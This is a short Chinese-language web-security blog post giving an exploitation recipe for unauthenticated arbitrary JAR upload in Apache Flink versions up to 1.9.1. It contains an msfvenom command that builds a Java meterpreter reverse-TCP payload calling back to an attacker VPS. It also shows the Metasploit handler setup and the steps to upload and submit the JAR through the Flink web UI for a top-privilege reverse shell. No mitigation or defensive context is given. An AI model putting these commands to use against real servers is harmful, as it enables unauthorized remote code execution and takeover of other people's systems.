Apache-flink 未授权访问任意jar包上传反弹shell

[rihide]

Apache-flink 未授权访问任意jar包上传反弹shell

影响版本: flink<=1.9.1

利用方法:

msf开启监听
`
msfvenom -p java/meterpreter/reverse_tcp LHOST=vpsip LPORT=6666 -f jar > flink.jar

use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST vpsip
set LPORT 6666
`

触发条件:

访问ip:port/#/submit/submit
Upload flink.jar之后,点击已上传jar包,submit即可反弹最高权限shell

[/rihide]

给TA买糖
共{{data.count}}人
人已赞赏
Web安全

果聊连载之"探探"也被沦陷了?

2020-8-14 22:58:21

Web安全

红队利器预告:漏洞库+武器库(第一批漏洞库库开放)

2020-12-21 8:58:45

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索